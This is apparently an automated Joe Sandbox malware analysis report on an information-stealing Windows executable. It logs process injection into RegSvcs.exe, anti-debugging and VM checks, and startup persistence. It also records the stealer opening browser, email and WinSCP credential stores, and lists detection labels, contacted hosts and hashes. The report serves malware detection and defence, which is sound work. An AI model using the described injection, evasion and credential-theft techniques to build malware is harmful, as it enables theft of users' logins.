Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exe Code function: 5_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,5_2_0040E500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99889
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99756
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99637
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99529
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99371
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98657
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98407
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97454
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98029
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97812Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97703Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97593Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97484Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97374Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97265Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97156Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97046Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96937Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000004.00000002.1842770518.0000022CB5D54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: incalculability.exe, 00000005.00000002.1899521936.00000000008E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeAPI call chain: ExitProcess graph end nodegraph_5-84845
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0045A370 BlockInput,5_2_0045A370
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D590
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0040EBD0 LoadLibraryA,GetProcAddress,5_2_0040EBD0
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_03F276F0 mov eax, dword ptr fs:[00000030h]5_2_03F276F0
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_03F28DD0 mov eax, dword ptr fs:[00000030h]5_2_03F28DD0
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_03F28D70 mov eax, dword ptr fs:[00000030h]5_2_03F28D70
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,5_2_004238DA
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0041F250 SetUnhandledExceptionFilter,5_2_0041F250
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0041A208
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00417DAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EAF008Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CDE008Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00436CD7 LogonUserW,5_2_00436CD7
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D590
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00434418
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,5_2_0043333C
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\q6utlq83i0.exe"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\inhumate\incalculability.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\inhumate\incalculability.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00446124
Source: incalculability.exeBinary or memory string: Shell_TrayWnd
Source: q6utlq83i0.exe, incalculability.exe.0.drBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,5_2_004720DB
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00472C3F GetUserNameW,5_2_00472C3F
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_0041E364
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,5_2_0040E500
Source: C:\Users\user\Desktop\q6utlq83i0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: incalculability.exeBinary or memory string: WIN_XP
Source: incalculability.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: incalculability.exeBinary or memory string: WIN_XPe
Source: incalculability.exeBinary or memory string: WIN_VISTA
Source: incalculability.exeBinary or memory string: WIN_7
Source: incalculability.exeBinary or memory string: WIN_8
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,5_2_004652BE
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00476619
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,5_2_0046CEF3
[MITRE ATT&CK matrix. Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
[Behavior Graph. ID: 1528987, Sample: q6utlq83i0.exe, Start date: 08/10/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
q6utlq83i0.exe | 63% | ReversingLabs | Win32.Spyware.Negasteal |
q6utlq83i0.exe | 100% | Avira | HEUR/AGEN.1321671 |
q6utlq83i0.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\inhumate\incalculability.exe | 100% | Avira | HEUR/AGEN.1321671 |
C:\Users\user\AppData\Local\inhumate\incalculability.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\inhumate\incalculability.exe | 63% | ReversingLabs | Win32.Ransomware.RedLine |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://api.ipify.org/ | 0% | URL Reputation | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.privateemail.com | 198.54.122.135 | true | false | | unknown
api.ipify.org | 104.26.12.205 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
198.54.122.135 | mail.privateemail.com | United States | | 22612 | NAMECHEAP-NETUS | false

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1528987
Start date and time:2024-10-08 14:43:19 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 56s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:13
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:q6utlq83i0.exe
renamed because original name is a hash value
Original Sample Name:a0ce83972e16b826fc209b7272260aa7ca67b58cec13fb62c5285bde3ab7a257.exe
Detection:MAL
Classification:mal100.spyw.expl.evad.winEXE@14/3@2/2
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 56
  • Number of non-executed functions: 303
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: q6utlq83i0.exe

Time | Type | Description
08:44:18 | API Interceptor | 54x Sleep call for process: RegSvcs.exe modified
13:44:17 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs
                          • 162.255.117.53
                          PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                          • 198.54.114.247
                          Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                          • 68.65.122.222
                          IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                          • 162.213.249.216
                          Arrival Notice.exeGet hashmaliciousFormBookBrowse
                          • 162.0.238.238
                          Arrival notice.exeGet hashmaliciousFormBookBrowse
                          • 162.0.238.246
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0e103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 104.26.12.205
                          Halkbank_Ekstre_20240508_074644_755730.pdf.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.12.205
                          PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 104.26.12.205
                          http://cdn.prod.website-files.com/66006200351a0e5dfaa727ed/66de69bda1d04790a2e6ba98_54204894406.pdfGet hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          file.exeGet hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          https://simpleinvoices.io/invoices/gvexd57Lej7Get hashmaliciousUnknownBrowse
                          • 104.26.12.205
                          eshkere.batGet hashmaliciousXmrigBrowse
                          • 104.26.12.205
                          JFFjXW16yR.exeGet hashmaliciousDarkCloud, PureLog Stealer, zgRATBrowse
                          • 104.26.12.205
                          TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                          • 104.26.12.205
                          SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.12.205
                          No context
                          Process:C:\Users\user\Desktop\q6utlq83i0.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):267776
                          Entropy (8bit):7.89078355285729
                          Encrypted:false
                          SSDEEP:6144:yY5T40j/uallpA7F2gcfwxPXtWQGNthGAv:ygjGJ7sfYXYHthN
                          MD5:AA07B0322F0F09B9516AE13B72C989E7
                          SHA1:9863D15DBE6746B92935F33DAEE50D9F33A1D03F
                          SHA-256:163B945D94EEB276CDCFA0FE716722F9479BA7FDE628BE0E299CF77CCF2971CC
                          SHA-512:5C1F705C97BAB43339EF286853F72C77A877B87A4B7142B4D2284B734F05FFA48A14B05EA626F99BCD541A5740F74AA1052A4EA630BDF17EDE3D112C8003CF19
                          Malicious:false
                          Reputation:low
                          Process:C:\Users\user\Desktop\q6utlq83i0.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1301411
                          Entropy (8bit):7.507505928988643
                          Encrypted:false
                          SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCznZeX4CCmLFtyfHIHjw3Oz/ijaX:7JZoQrbTFZY1iaCznMCiFtygHcOTN
                          MD5:2B2832A4E1BF4E26E59980F4162334E2
                          SHA1:A9AE9ED9B7804A21FC0CF1E6B0D7D2E9F18B8336
                          SHA-256:A0CE83972E16B826FC209B7272260AA7CA67B58CEC13FB62C5285BDE3AB7A257
                          SHA-512:26FC4677D42D3C0DAE70A0F5C8C8E0987BAC137D94D6973883DE48C3DE028424E77C2227D14B4D59B9EAFE097A5E3DDE29D275FBE1DE3CE7FE880D4496228F01
